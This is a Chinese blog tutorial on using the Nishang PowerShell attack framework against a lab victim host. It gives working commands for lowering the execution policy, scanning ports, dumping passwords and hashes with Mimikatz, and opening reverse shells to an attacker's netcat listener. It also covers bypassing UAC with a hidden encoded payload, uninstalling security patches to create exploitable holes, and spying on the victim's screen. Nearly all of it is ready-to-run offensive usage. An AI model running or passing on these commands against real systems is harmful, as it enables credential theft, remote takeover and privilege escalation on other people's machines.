Nishang PowerShell框架使用

Nishang

项目下载地址:https://github.com/samratashok/nishang

nishang的简单介绍

Nishang是一个PowerShell攻击框架,它是PowerShell攻击脚本和有效载荷的一个集合。

nishang下载后的目录列表如下图所示,每个目录对应一个功能模块

nishang的简单使用

首先打开powershell

导入模块 nishang

必须导入nishang模块,才可以使用这个工具

Import-Module .\nishang.psm1

初次导入,会有红色字的警告提示,如上图所示,是因为windows官方做的一个安全策略导致

解决方法:把执行策略修改一下即可,执行完命令之后按默认选项回车即可

Set-ExecutionPolicy RemoteSigned

再次导入模块 nishang,没有宏色警告了,下图中黄色的警告不用管

查看nishang模块的所有功能:

Get-Command -Module nishang 得到的命令来自nishang模块

比如:

Check-VN:检测是否是虚拟机版本

Get-Information:获取常规计算机信息

端口扫描

扫描192.168.184.125-192.168.184.130所有存活主机,以及存活主机开放的端口

Invoke-PortScan -StartAddress 192.168.184.125 -EndAddress 192.168.184.130 -ResolveHost -ScanPort

获取计算机密码

加载mimikatz获取计算机密码

Invoke-Mimikatz

如果是简单密码可以直接显示出来,复杂密码显示hash值

注意:

如果报错提示:win10 ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory

需要win10以管理员身份运行powershell即可解决该问题

获取计算机密码hash值

获取账号密码的hash值

Get-PassHashes

反弹shell

Invoke-PowershellTcp -Reverse -IPAddress x.x.x.x -Port xxxx
nc -lvvp xxxx
反弹tcp协议

Invoke-Powershelludp -Reverse -IPAddress x.x.x.x -port xxxx
nc -lup xxxx
反弹udp协议

Invoke-PoshRatHttp -IPAddress x.x.x.x -Port xxxx
反弹http协议

Invoke-PoshRatHttps -IPAddress x.x.x.x -Port xxxx
反弹https协议

加入你已经poweshell控制了对方电脑,需要把会话反弹

首先打开kali监听端口1111

nc -nvlp 1111

反弹shell到192.168.184.145的1111端口

Invoke-PowerShellTcp -Reverse -IPAddress 192.168.184.145 -Port 1111

执行命令后,成功反弹shell如下图所示

BypassUAC提权

假设已经将nishang下载到受害主机接下来需要进行UAC提权

使用sysprep方法和默认的Payload执行

Invoke-PsUACme -Verbose

打开受害者主机的powershell,执行命令: Invoke-PsUACme ,执行成功后会弹窗一个窗口,

窗口是超级管理员权限,可以添加账号

//使用oobe方法和默认的Payload执行
Invoke-PsUACme -method oobe -Verbose
//使用-Payload参数可以自行指定要执行的Payload
Invoke-PsUACme -method oobe -Payload "powershell -windowstyle hidden -e YourEncodedPayload"

删除补丁

Remove-Update KB4534132

比如删除KB2534111补丁包,如下图所示。

删除补丁包之后服务器会出现漏洞,可根据漏洞进行利用

屏幕监控

靶机:Show-TargetScreen -Reverse -IPAddress x.x.x.x -Port xxxx
攻击机:netcat -nlvp xxxx | netcat -nlvp yyyy
URL访间攻击机 IP: yyyy

比如在靶机上执行命令:

Show-TargetScreen -Reverse -IPAddress 192.168.184.145 -Port 1111

在kali上执行监听命令,并且将监听到的1111端口的数据转发到9999端口上去

在kali浏览器上输入:127.0.0.1:9999 可以实时监控靶机电脑屏幕

除了以上示例之外,还可以及逆行弱口令爆破、内网嗅探、中间人攻击等。

posted @ 2025-12-04 16:29  shinianyunyan  阅读(1)  评论(0)    收藏  举报